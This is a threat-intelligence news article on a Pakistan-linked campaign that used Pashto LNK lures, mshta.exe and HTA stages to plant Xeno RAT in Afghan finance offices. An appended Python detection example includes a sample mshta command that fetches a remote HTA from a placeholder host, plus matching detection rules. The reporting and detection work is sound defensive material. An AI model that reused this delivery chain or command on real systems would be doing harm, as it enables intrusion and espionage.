SideCopy Uses Xeno RAT to Target Afghan Finance Ministry

Pashto-language spear-phishing ZIPs with malicious LNK shortcuts delivered Xeno RAT to Afghanistan’s Ministry of Finance and several provincial finance offices.

Security researchers disclosed a Pakistan-linked campaign that used Pashto-language spear-phishing lures to deliver the open-source remote access trojan Xeno RAT to Afghanistan’s Ministry of Finance and multiple provincial finance and revenue directorates. The operation has been named Operation XENOFISCAL and is linked to the SideCopy cluster associated with the Transparent Tribe group, also tracked as APT36.

Seqrite Labs researcher Dixit Panchal described the initial delivery as a ZIP archive containing a Windows shortcut file (LNK) with a Pashto filename. When opened, the shortcut launches mshta.exe to download an HTML Application (HTA) from a compromised Afghan education domain. The HTA executes obfuscated JavaScript in memory as the next stage of the infection chain.

The staged payload uses a DLL-based loader to drop Xeno RAT version 1.8.7 and a decoy document. The loader creates Registry-based persistence that imitates Microsoft Edge and sets up a scheduled task to run the malware on a regular basis.

Xeno RAT establishes a TCP connection to a remote operator and can load external DLL modules. The implant supports file collection and exfiltration, execution of arbitrary commands, and management of persistence. Other capabilities observed include gathering antivirus information, creating SOCKS5 proxy tunnels for network pivoting, file operations, keystroke logging, taking screenshots, monitoring the clipboard, and accessing webcams and microphones. The malware can remove persistence entries and uninstall itself.

Researchers noted the use of Pashto in the lure files and the choice of targets as indicators that the operators were familiar with the local environment. The campaign focused on Pashto-speaking government officials and provincial employees in financial roles; observed objectives included obtaining credentials, accessing files and maintaining persistent access to compromised systems.

Seqrite Labs linked Operation XENOFISCAL to broader Transparent Tribe activity in the region. Earlier reports associated the group with attacks that used Xeno RAT, Spark RAT and CurlBack RAT against organizations in South Asia. A related campaign targeting Indian military infrastructure used weaponized Linux .desktop launcher files and WhatsApp-based social engineering to deliver a staged shell payload and a Golang-based ELF implant tracked as DeskRAT. Researcher R.D. Tarun wrote that the campaign appeared to target individuals connected to Indian military and defense infrastructure.

Seqrite Labs published technical indicators from the Afghan campaign, including the Pashto-named lure files, the HTA retrieval from the compromised domain, the mshta.exe invocation and the DLL loader behavior. Organizations handling financial or defense-related information in the region were advised to review email filtering rules, inspect archived attachments for LNK files, and monitor for unusual mshta.exe activity, scheduled tasks that mimic browsers, and unexpected outbound TCP connections consistent with remote access trojans.
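As an added illustration of the monitoring advice above (not code from Seqrite Labs or this article), the following Python triages constructed Sysmon-style process events and scheduled-task records for two of the behaviours named: mshta.exe launched with a remote HTA, and a browser-named scheduled task whose action runs from outside the browser's install tree. The field names, paths and domain are assumptions made up for the example.

```python
import re
from pathlib import PureWindowsPath

# Constructed Sysmon-style process-creation records (assumption: field names
# mirror Sysmon Event ID 1; the values are made up for this example).
PROCESS_EVENTS = [
    {"Image": r"C:\Windows\System32\mshta.exe",
     "ParentImage": r"C:\Windows\explorer.exe",          # user opened the LNK
     "CommandLine": "mshta.exe https://compromised-site.invalid/lure.hta"},
    {"Image": r"C:\Windows\System32\mshta.exe",
     "ParentImage": r"C:\Program Files\Vendor\setup.exe",  # benign local HTA
     "CommandLine": r"mshta.exe C:\Program Files\Vendor\wizard.hta"},
]

# Constructed scheduled-task registrations (assumption: a SIEM has flattened
# Security event 4698 into the task name and the command it executes).
TASK_EVENTS = [
    {"TaskName": r"\MicrosoftEdgeUpdateTaskMachine",
     "Command": r"C:\Users\user\AppData\Roaming\Edge\msedge.exe"},
    {"TaskName": r"\MicrosoftEdgeUpdateTaskMachineCore",
     "Command": r"C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe"},
]

REMOTE_ARG = re.compile(r"(https?://|\\\\)", re.IGNORECASE)   # URL or UNC path
BROWSER_NAME = re.compile(r"edge|chrome|firefox", re.IGNORECASE)
BROWSER_DIRS = (r"\microsoft\edge", r"\microsoft\edgeupdate",
                r"\google\chrome", r"\mozilla firefox")

def suspicious_mshta(event):
    """mshta.exe handed a remote HTA is the LNK -> HTA stage described above."""
    image = PureWindowsPath(event["Image"]).name.lower()
    return image == "mshta.exe" and bool(REMOTE_ARG.search(event["CommandLine"]))

def browser_mimic_task(task):
    """A browser-named task whose action lives outside a browser install tree."""
    if not BROWSER_NAME.search(task["TaskName"]):
        return False
    cmd = task["Command"].lower()
    return not any(d in cmd for d in BROWSER_DIRS)

def triage(process_events, task_events):
    """Return one finding string per event that matches either rule."""
    findings = [f"mshta remote HTA: {e['CommandLine']} (parent {e['ParentImage']})"
                for e in process_events if suspicious_mshta(e)]
    findings += [f"browser-mimic task: {t['TaskName']} -> {t['Command']}"
                 for t in task_events if browser_mimic_task(t)]
    return findings

if __name__ == "__main__":
    for finding in triage(PROCESS_EVENTS, TASK_EVENTS):
        print(finding)
```

On the constructed input only the explorer-spawned mshta.exe fetching an HTA over HTTPS and the Edge-named task running from a user profile directory are reported.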
